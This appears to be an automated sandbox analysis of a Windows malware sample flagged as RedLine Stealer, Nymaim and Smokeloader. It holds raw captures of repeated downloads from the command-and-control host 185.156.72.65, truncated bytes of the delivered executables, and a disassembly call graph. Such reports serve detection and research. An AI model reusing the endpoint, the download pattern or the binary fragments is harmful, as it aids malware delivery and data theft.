                                                      Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
                                                      Nov 30, 2024 05:35:22.278404951 CET448INData Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd
                                                      Data Ascii: Dp!l*R7+2J^*'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: *rUz(-dFI?[*VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
                                                      Nov 30, 2024 05:35:22.278511047 CET1236INData Raw: 94 56 6f 92 44 df 99 d0 e2 07 87 22 38 2a d1 8d 6b 3b c8 f7 e1 b5 00 e9 38 74 ca 24 b7 c2 3f 88 77 ac 79 7e 4b f0 5e 79 57 bd f5 65 c6 f8 b8 fd c0 5d 9c 70 37 a5 45 ab 76 ba a0 33 8b ee 99 a3 da 61 9a 35 1f f1 31 09 03 71 96 d5 28 76 57 11 9e 5e
                                                      Data Ascii: VoD"8*k;8t$?wy~K^yWe]p7Ev3a51q(vW^RK@$V+4trcwMMZoj^}xmgu0f'US]*04<cMk2cD$g|5r_gqKgLoZ
                                                      Nov 30, 2024 05:35:22.278523922 CET1236INData Raw: 58 c0 cb 65 40 62 96 d2 c0 5a b0 40 d6 25 d6 ca ea 81 87 4f 4f 97 dc 41 ef 2a 66 64 06 53 6d 2a 3f d8 44 59 af 7a 70 c9 ee 8f c8 c1 db 27 48 69 d8 e7 8e c2 56 b7 01 bc 0b 63 45 c8 b6 b5 e2 1a ee a7 1a fe a7 05 65 86 dc c4 60 f9 00 38 79 10 46 0b
                                                      Data Ascii: Xe@bZ@%OOA*fdSm*?DYzp'HiVcEe`8yF|G(^80y-`p+x@Q.QjK=s3GVBfP:}^-RuJhJHz#<6S}Cc*>:cNZNG1M4
                                                      Nov 30, 2024 05:35:22.278651953 CET1236INData Raw: 97 c8 49 60 d1 46 16 fc 9d 61 11 37 f4 93 5e ed 32 7a c7 3b 41 14 16 b7 4f 84 8d 39 ca 79 46 fc 2f a4 a6 82 f3 b6 68 61 61 41 32 66 02 00 57 51 d9 b9 0a 9a 35 e2 01 f6 64 48 f1 ee 15 5c 2f c3 ce e2 74 99 ad e8 49 c0 49 83 58 d9 d9 5f 15 11 8a 28
                                                      Data Ascii: I`Fa7^2z;AO9yF/haaA2fWQ5dH\/tIIX_( N%"PPLT(yFqG=)hZX.`2RsbifK!97e9f|uUsetj9L~DY)5:w<}gBO$5)iI
                                                      Nov 30, 2024 05:35:22.278662920 CET1236INData Raw: bd fe 32 26 39 43 46 ac 46 98 3a a9 90 2f db c5 e7 08 95 6c c4 71 43 67 26 21 a1 8e e2 57 01 bf 17 eb ec 95 38 79 19 72 66 f5 b3 f7 1b 75 10 9d 34 6d e2 d0 9a 09 6a 6b 6e fb a0 1b a0 0c 89 8d 39 0d 7b 82 10 1c fb a1 a0 b6 fb 0b bd 91 68 87 0f bc
                                                      Data Ascii: 2&9CFF:/lqCg&!W8yrfu4mjkn9{h`e\lrp<wW+:s_m]sad8t43g\]Dh-@H<|jSWU@E/]-L[uNIhq8~'??y9<N5)g.AK2T
                                                      Nov 30, 2024 05:35:22.278675079 CET1236INData Raw: 9c 93 85 55 4b b0 90 0f 56 82 0c 86 f6 cc 27 8b b1 b8 1f 77 0d b6 88 24 2a 38 27 bc 8c 03 45 5b 5b 2b 90 a7 9b 51 a3 04 60 88 c5 2c 4a 7a 88 0a 01 7d 0c 2e 87 47 cf 80 8f 5e 70 62 4c d5 ad ce bf 64 f2 8f 59 f3 8f 0c c9 92 4f 19 2f 5b b6 f8 01 87
                                                      Data Ascii: UKV'w$*8'E[[+Q`,Jz}.G^pbLdYO/[)o319Xz&k(pB~IjB1aNG^L/QAD!B5F$%RkQzo):z4fJnpb7[w\n@hm,tsY!FZ*b[.LJT/
                                                      Nov 30, 2024 05:35:22.278810978 CET1236INData Raw: 92 77 46 c5 a7 fd 0a 9c 05 19 d8 07 e6 4e b6 52 f6 4f b7 e8 ab ac 30 f3 96 21 2d c8 20 bf 88 b6 9e a4 76 30 56 bc a4 59 bd ec 71 d2 3d ed d8 5f 82 8c b2 16 8f 65 8e 70 b5 77 5e 52 a6 89 7a 08 f3 c9 84 ea 32 44 a6 8a 12 81 c2 79 91 50 d2 42 01 86
                                                      Data Ascii: wFNRO0!- v0VYq=_epw^Rz2DyPBh0;ZP!WD.&\"'A2tCarnt9zq]&gmk0~q\mk0G@D)ewX5'%?/-Rcsi?G(F;7@J2v_9`P,uA
                                                      Nov 30, 2024 05:35:22.286966085 CET1236INData Raw: 63 70 2d 5e 06 f9 a0 88 b2 fe 94 69 78 3a 4d 9f ad 12 4c f0 0a b3 a2 cb 51 00 a5 7b 91 82 2b bb fa aa 10 54 85 b0 7c f4 3c 4b 81 dd ca da d8 19 bf dc 6e eb 76 44 8c 05 1f 15 0d a7 42 02 a3 d9 fa bd 7f 9d a5 c8 1a 0f a8 ed c9 af 96 dc b8 58 66 95
                                                      Data Ascii: cp-^ix:MLQ{+T|<KnvDBXfbyQ#^XJx^0V|eQSSO^_]/qA]E<P/(#o(MDvo.QcR*S8k][[{:?uH+go6S%m:
                                                      Nov 30, 2024 05:35:22.287056923 CET1236INData Raw: d4 4c f7 39 c8 e2 8c 1a 47 22 ce 38 a8 0f 36 ba 34 d8 29 d1 07 03 f8 62 9b f4 dc 09 93 7c a9 be 5b 41 f1 b1 38 bc e4 80 f5 2a 12 1e 39 e6 d0 ae 98 c1 0b 4b e0 90 07 04 7c d4 0b 2b 53 92 54 65 fd f5 63 a1 24 fa 52 82 fe 3a 65 6f b5 81 39 e1 46 11
                                                      Data Ascii: L9G"864)b|[A8*9K|+STec$R:eo9FloSxG~rMH'+},C{k)n8l5/wd<JjxYil$X#9}LcWFmf\4{iEd"Fl@=l5scroIjy
                                                      Nov 30, 2024 05:35:22.875024080 CET395OUTGET /files/download HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: C
                                                      Host: 185.156.72.65
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Nov 30, 2024 05:35:23.434633017 CET203INHTTP/1.1 200 OK
                                                      Date: Sat, 30 Nov 2024 04:35:23 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=97
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Nov 30, 2024 05:35:25.729911089 CET395OUTGET /files/download HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: C
                                                      Host: 185.156.72.65
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Nov 30, 2024 05:35:26.290884972 CET203INHTTP/1.1 200 OK
                                                      Date: Sat, 30 Nov 2024 04:35:25 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=96
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Nov 30, 2024 05:35:28.371345997 CET395OUTGET /files/download HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: C
                                                      Host: 185.156.72.65
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Nov 30, 2024 05:35:28.921997070 CET203INHTTP/1.1 200 OK
                                                      Date: Sat, 30 Nov 2024 04:35:28 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=95
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Nov 30, 2024 05:35:30.946860075 CET395OUTGET /files/download HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: C
                                                      Host: 185.156.72.65
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Nov 30, 2024 05:35:31.515216112 CET203INHTTP/1.1 200 OK
                                                      Date: Sat, 30 Nov 2024 04:35:31 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=94
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Nov 30, 2024 05:35:33.556210041 CET395OUTGET /files/download HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: C
                                                      Host: 185.156.72.65
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Nov 30, 2024 05:35:34.113322020 CET203INHTTP/1.1 200 OK
                                                      Date: Sat, 30 Nov 2024 04:35:33 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=93
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Nov 30, 2024 05:35:36.276000977 CET395OUTGET /files/download HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: C
                                                      Host: 185.156.72.65
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Nov 30, 2024 05:35:36.844028950 CET203INHTTP/1.1 200 OK
                                                      Date: Sat, 30 Nov 2024 04:35:36 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=92
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Nov 30, 2024 05:35:38.869414091 CET395OUTGET /files/download HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: C
                                                      Host: 185.156.72.65
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Nov 30, 2024 05:35:39.433187008 CET203INHTTP/1.1 200 OK
                                                      Date: Sat, 30 Nov 2024 04:35:39 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=91
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Nov 30, 2024 05:35:41.448314905 CET395OUTGET /files/download HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: C
                                                      Host: 185.156.72.65
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Nov 30, 2024 05:35:42.043876886 CET203INHTTP/1.1 200 OK
                                                      Date: Sat, 30 Nov 2024 04:35:41 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=90
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Nov 30, 2024 05:35:44.056226969 CET395OUTGET /files/download HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: C
                                                      Host: 185.156.72.65
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Nov 30, 2024 05:35:44.625180006 CET203INHTTP/1.1 200 OK
                                                      Date: Sat, 30 Nov 2024 04:35:44 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=89
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Nov 30, 2024 05:35:46.650146008 CET395OUTGET /files/download HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: C
                                                      Host: 185.156.72.65
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Nov 30, 2024 05:35:47.495434999 CET203INHTTP/1.1 200 OK
                                                      Date: Sat, 30 Nov 2024 04:35:46 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=88
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Nov 30, 2024 05:35:47.556376934 CET203INHTTP/1.1 200 OK
                                                      Date: Sat, 30 Nov 2024 04:35:46 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=88
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Nov 30, 2024 05:35:49.534894943 CET395OUTGET /files/download HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: C
                                                      Host: 185.156.72.65
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Nov 30, 2024 05:35:50.096812010 CET203INHTTP/1.1 200 OK
                                                      Date: Sat, 30 Nov 2024 04:35:49 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=87
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Nov 30, 2024 05:35:53.149971008 CET394OUTGET /soft/download HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: d
                                                      Host: 185.156.72.65
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Nov 30, 2024 05:35:53.925287962 CET1236INHTTP/1.1 200 OK
                                                      Date: Sat, 30 Nov 2024 04:35:53 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Disposition: attachment; filename="dll";
                                                      Content-Length: 242176
                                                      Keep-Alive: timeout=5, max=86
                                                      Connection: Keep-Alive
                                                      Content-Type: application/octet-stream
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}*:s(**2rp(;&*Vrprp*(*>}*(Co(D(E}(F(E(G&*>}*(Co(D}(F(E(H&*"*>}*R} { oo*{ *"}!*{!*}{#{op{,{ oo*{!oo*{*Bsu
                                                      Nov 30, 2024 05:35:54.493249893 CET394OUTGET /soft/download HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: s
                                                      Host: 185.156.72.65
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Nov 30, 2024 05:35:55.446454048 CET1236INHTTP/1.1 200 OK
                                                      Date: Sat, 30 Nov 2024 04:35:54 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Disposition: attachment; filename="soft";
                                                      Content-Length: 1502720
                                                      Keep-Alive: timeout=5, max=85
                                                      Connection: Keep-Alive
                                                      Content-Type: application/octet-stream
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU (*(*~-rp(os~*~**j(r=p~ot*j(rMp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*~*(*Vs(t*N(((*0f(8Mo9:oo-a


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:1
                                                      Start time:23:35:10
                                                      Start date:29/11/2024
                                                      Path:C:\Users\user\Desktop\file.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                      Imagebase:0x400000
                                                      File size:1'995'776 bytes
                                                      MD5 hash:9D2EED099096486E2AE388B2B220497C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2025597799.0000000004780000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000001.00000003.1309173402.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:01:29:34
                                                      Start date:30/11/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 644
                                                      Imagebase:0x320000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:3.6%
                                                        Dynamic/Decrypted Code Coverage:11.4%
                                                        Signature Coverage:56.4%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:26
                                                        execution_graph 41399 401970 41400 4019df InternetSetFilePointer InternetReadFile 41399->41400 41401 401a80 __CreateFrameInfo 41400->41401 41402 401aaa HttpQueryInfoA 41401->41402 41403 401ad3 CoCreateInstance 41402->41403 41404 401e1a 41402->41404 41403->41404 41407 401b0c 41403->41407 41468 409a17 41404->41468 41406 401e43 41407->41404 41432 402760 41407->41432 41409 401b5c 41410 401c35 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41409->41410 41411 401e49 41409->41411 41415 401dbc __InternalCxxFrameHandler 41410->41415 41448 409b8a 41410->41448 41475 40cfef 41411->41475 41415->41404 41416 401c6b 41416->41415 41417 409b8a 41 API calls 41416->41417 41422 401d23 __InternalCxxFrameHandler 41416->41422 41418 401cf7 __CreateFrameInfo 41417->41418 41418->41422 41426 401d5c 41418->41426 41427 401d4f 41418->41427 41419 401dab 41465 40d0dd 14 API calls __dosmaperr 41419->41465 41421 401db8 __CreateFrameInfo 41421->41415 41466 40d0dd 14 API calls __dosmaperr 41421->41466 41422->41415 41422->41419 41422->41421 41423 401db0 41467 40cfdf 39 API calls __cftof 41423->41467 41426->41422 41463 40d0dd 14 API calls __dosmaperr 41426->41463 41462 40d0dd 14 API calls __dosmaperr 41427->41462 41429 401d54 41464 40cfdf 39 API calls __cftof 41429->41464 41433 402830 41432->41433 41434 40277f 41432->41434 41482 401600 43 API calls 3 library calls 41433->41482 41437 40278b __InternalCxxFrameHandler 41434->41437 41438 4027b3 41434->41438 41440 4027f7 41434->41440 41441 4027ee 41434->41441 41436 402835 41483 401560 41 API calls 3 library calls 41436->41483 41437->41409 41480 401560 41 API calls 4 library calls 41438->41480 41447 4027cf __InternalCxxFrameHandler 41440->41447 41481 401560 41 API calls 4 library calls 41440->41481 41441->41436 41441->41438 41443 4027c6 41444 40cfef 39 API calls 41443->41444 41443->41447 41446 40283f 41444->41446 41447->41409 41450 409b4c 41448->41450 41451 409b6b 41450->41451 41453 409b6d 41450->41453 41486 4116b2 EnterCriticalSection LeaveCriticalSection __dosmaperr 41450->41486 41487 40fb4d 41450->41487 41451->41416 41454 401560 Concurrency::cancel_current_task 41453->41454 41456 409b77 41453->41456 41484 40af80 RaiseException 41454->41484 41494 40af80 RaiseException 41456->41494 41458 40157c 41485 40ad31 40 API calls 2 library calls 41458->41485 41459 40a589 41461 4015a3 41461->41416 41462->41429 41463->41429 41464->41422 41465->41423 41466->41423 41467->41415 41469 409a20 IsProcessorFeaturePresent 41468->41469 41470 409a1f 41468->41470 41472 409a67 41469->41472 41470->41406 41497 409a2a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 41472->41497 41474 409b4a 41474->41406 41498 40cf2b 39 API calls __cftof 41475->41498 41477 40cffe 41499 40d00c 11 API calls __CreateFrameInfo 41477->41499 41479 40d00b 41480->41443 41481->41447 41482->41436 41483->41443 41484->41458 41485->41461 41486->41450 41493 413cb9 __dosmaperr 41487->41493 41488 413cf7 41496 40d0dd 14 API calls __dosmaperr 41488->41496 41489 413ce2 RtlAllocateHeap 41491 413cf5 41489->41491 41489->41493 41491->41450 41493->41488 41493->41489 41495 4116b2 EnterCriticalSection LeaveCriticalSection __dosmaperr 41493->41495 41494->41459 41495->41493 41496->41491 41497->41474 41498->41477 41499->41479 41500 4787cb9 41503 4787cc4 41500->41503 41504 4787cd3 41503->41504 41507 4788464 41504->41507 41508 478847f 41507->41508 41509 4788488 CreateToolhelp32Snapshot 41508->41509 41510 47884a4 Module32First 41508->41510 41509->41508 41509->41510 41511 4787cc3 41510->41511 41512 47884b3 41510->41512 41514 4788123 41512->41514 41515 478814e 41514->41515 41516 4788197 41515->41516 41517 478815f VirtualAlloc 41515->41517 41516->41516 41517->41516 41518 40a0b1 41519 40a0bd __FrameHandler3::FrameUnwindToState 41518->41519 41546 409e11 41519->41546 41521 40a0c4 41522 40a217 41521->41522 41534 40a0ee ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 41521->41534 41573 40a58a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __CreateFrameInfo 41522->41573 41524 40a21e 41574 4106ab 41524->41574 41528 40a22c 41529 40a10d 41530 40a18e 41554 40a6a5 41530->41554 41534->41529 41534->41530 41572 410685 39 API calls 3 library calls 41534->41572 41547 409e1a 41546->41547 41578 40a2ec IsProcessorFeaturePresent 41547->41578 41549 409e26 41579 40b77d 10 API calls 2 library calls 41549->41579 41551 409e2b 41553 409e2f 41551->41553 41580 40b79c 7 API calls 2 library calls 41551->41580 41553->41521 41581 40b570 41554->41581 41556 40a6b8 GetStartupInfoW 41557 40a194 41556->41557 41558 412288 41557->41558 41583 41816d 41558->41583 41560 412291 41561 40a19c 41560->41561 41589 41841d 39 API calls 41560->41589 41563 4087e0 